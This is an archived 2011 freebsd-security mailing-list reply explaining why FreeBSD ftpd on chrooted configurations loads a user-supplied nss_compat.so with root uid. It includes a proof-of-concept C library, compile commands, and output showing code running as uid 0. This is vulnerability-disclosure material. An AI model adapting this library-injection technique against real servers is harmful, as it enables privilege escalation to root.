Date: Wed, 30 Nov 2011 22:09:18 +0100 From: Przemyslaw Frasunek <przemyslaw@frasunek.com> To: Mike Tancsa <mike@sentex.net> Cc: "freebsd-security@freebsd.org" <freebsd-security@freebsd.org> Subject: Re: ftpd security issue ? Message-ID: <4ED69B7E.50505@frasunek.com> In-Reply-To: <4ED68B4D.4020004@sentex.net> References: <4ED68B4D.4020004@sentex.net>
next in thread | previous in thread | raw e-mail | index | archive | help
> Saw this on FD... Anyone know any more details about this ? > http://lists.grok.org.uk/pipermail/full-disclosure/2011-November/084372.html This is a well known hazard of chrooting to directories controlled by unprivileged users. In this case, vulnerability exists because ftpd calls /bin/ls with uid=0 and euid!=0 when STAT command is issued, and nss_compat.so is loaded by libc regardless of elevated privileges. This can be proven by creating dummy ~/lib/nss_compat.so.1: [venglin@lagoon ~/lib]$ cat dummy.c #include <stdio.h> #include <fcntl.h> void _init() { FILE *fp = fopen("asdf", "w+"); fprintf(fp, "%d %d\n", getuid(), geteuid()); } [venglin@lagoon ~/lib]$ cc -o dummy.o -c dummy.c -fPIC [venglin@lagoon ~/lib]$ cc -shared -Wl,-soname,dummy.so -o dummy.so dummy.o -nostartfiles [venglin@lagoon ~/lib]$ mv dummy.so nss_compat.so.1 And after calling STAT command: [venglin@lagoon ~/lib]$ cat ~/asdf 0 3000 BTW. This vulnerability affects only configurations, where /etc/ftpchroot exists or anonymous user is allowed to create files inside etc and lib dirs. -- * Fido: 2:480/124 ** WWW: http://www.frasunek.com ** NICHDL: PMF9-RIPE * * Jabber ID: venglin@nette.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ5JIV *
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?4ED69B7E.50505>